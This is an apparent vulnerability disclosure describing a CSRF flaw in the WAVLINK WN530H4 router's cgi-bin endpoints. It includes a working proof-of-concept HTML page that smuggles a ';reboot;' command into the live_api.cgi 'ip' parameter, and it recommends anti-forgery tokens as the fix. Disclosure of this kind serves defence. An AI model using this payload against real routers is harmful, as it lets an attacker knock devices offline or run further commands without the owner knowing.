This vulnerability is a Cross-Site Request Forgery (CSRF) in the WAVLINK WN530H4 router.
Many endpoints in the web interface /cgi-bin/ directory are vulnerable to CSRF. This effectively allows other websites to submit requests to the router page without the user knowing – even if the router manufacturers patch the cgi-bin authentication bypass (however, the attack will only work if the admin is logged in).
Malicious websites with hoards of router vulnerabilities could create traps on the Internet with maliciously-crafted websites that trigger vulnerabilities in the router. As an example, consider this malicious HTML page.
<html> <head> <title>Reboot!</title> <script src = "http://192.168.10.1/cgi-bin/live_api.cgi?page=hacked&id=1337&ip=;reboot;"></script> </head> <body> <h1>This webpage reboots the WAVLINK router.</h1> </body> </html>
This malicious HTML exploits the command line injection vulnerability “remotely” by rebooting the router (effectively causing a denial of service). An unsuspecting user could succumb themselves to this attack if they click a link with this vulnerable code. Of course, many more vulnerable attacks can be executed – including malicious binaries being downloaded remotely and executed.
To solve this, the router must employ protections. One such protection is employing anti-forgery tokens. It seems that the router manufacturers try this by protecting most of the webpages with a token, but none of the cgi-bin endpoints are protected by this, rendering this defense useless.
For more information and vulnerability analysis, please see my report on the WAVLINK WN530H4.